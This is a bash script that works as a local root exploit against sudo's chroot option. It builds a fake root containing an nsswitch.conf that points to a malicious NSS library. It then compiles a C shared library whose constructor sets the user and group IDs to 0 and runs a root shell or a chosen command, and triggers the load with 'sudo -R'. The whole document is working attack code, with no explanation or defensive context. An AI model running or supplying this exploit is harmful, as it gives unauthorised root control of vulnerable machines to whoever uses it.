#!/usr/bin/env bash
STAGE=$(mktemp -d /tmp/XXXXXX)
cd ${STAGE?} || exit 1

if [ $# -eq 0 ]; then
    CMD="/bin/bash"
else
    CMD="$@"
fi
CMD_C_ESCAPED=$(printf '%s' "$CMD" | sed -e 's/\\/\\\\/g' -e 's/"/\\"/g')

cat >w.c <<EOF
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/sh", "sh", "-c", "${CMD_C_ESCAPED}", NULL);
}
EOF

mkdir -p xd/etc libnss_
echo "passwd: /w" >xd/etc/nsswitch.conf
cp /etc/group xd/etc/

gcc -shared -fPIC -Wl,-init,w -o libnss_/w.so.2 w.c

sudo -R xd /bin/true
rm -rf ${STAGE?}